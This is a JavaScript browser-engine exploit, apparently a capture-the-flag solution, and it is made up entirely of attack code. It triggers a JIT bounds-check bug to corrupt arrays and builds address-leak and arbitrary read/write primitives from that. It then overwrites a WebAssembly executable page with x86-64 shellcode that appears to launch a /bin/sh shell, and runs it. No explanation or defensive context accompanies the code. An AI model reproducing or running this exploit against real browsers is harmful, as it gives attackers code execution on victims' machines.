let wasm_code = new Uint8Array([
0, 97,115,109, 1, 0, 0, 0, 1,133,128,128,128, 0,
1, 96, 0, 1,127, 3,130,128,128,128, 0, 1, 0, 4,
132,128,128,128, 0, 1,112, 0, 0, 5,131,128,128,128,
0, 1, 0, 1, 6,129,128,128,128, 0, 0, 7,145,128,
128,128, 0,2,6,109,101,109,111,114,121,2,0,4,109,97,
105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,
0,65,42,11
])
var wasmModule = new WebAssembly.Module(wasm_code)
var wasmInstance = new WebAssembly.Instance(wasmModule)
let conversionBuffer = new ArrayBuffer(0x40)
let floatView = new Float64Array(conversionBuffer)
let intView = new BigUint64Array(conversionBuffer)
BigInt.prototype.i2f = function(){intView[0] = this;return floatView[0]}
Number.prototype.f2i = function(){floatView[0] = this;return intView[0]}
trigger = bit => {
let c_arr = new Array((Math.min(((('1337'.indexOf(
bit?'1337':'31337')>>25)*1337)+1337),1338)>>8)-1)
let t_arr = [1.1,2.2,3.3,4.4]
c_arr[0] = 1.1
return [c_arr, t_arr]
}
hax = () => {
const f_Len = 8n << 32n
for(var i = 0; i < 100000; i++) trigger(true);
var [c_arr, t_arr] = trigger(false)
var obj_arr = [c_arr, t_arr]
r64 = where => {
c_arr[12] = (f_Len+where).i2f()
return t_arr[0].f2i()
}
w64 = (where, what) => {
c_arr[12] = (f_Len+where).i2f()
t_arr[0] = what.i2f()
}
addrOf = obj => {
obj_arr[0] = obj
return c_arr[34].f2i() >> 32n
}
let addrWasmInstance = addrOf(wasmInstance) - 1n
let rwx_page = r64(addrWasmInstance + 0x61n)
let arb = new ArrayBuffer(0x400)
let dv = new DataView(arb)
let addr_tarr = addrOf(arb) - 1n
w64(addr_tarr+(0x14n - 7n), rwx_page)
let shellcode = [
0xfe58426a, 0x529948c4, 0x622fbf48, 0x2f2f6e69,
0x54576873 ,0xd089495e, 0x0fd28949, 0x00000005
]
for(var i = 0; i < shellcode.length; i++) {
dv.setUint32(i * 4, shellcode[i], true)
}
wasmInstance.exports.main()
}
hax()
// END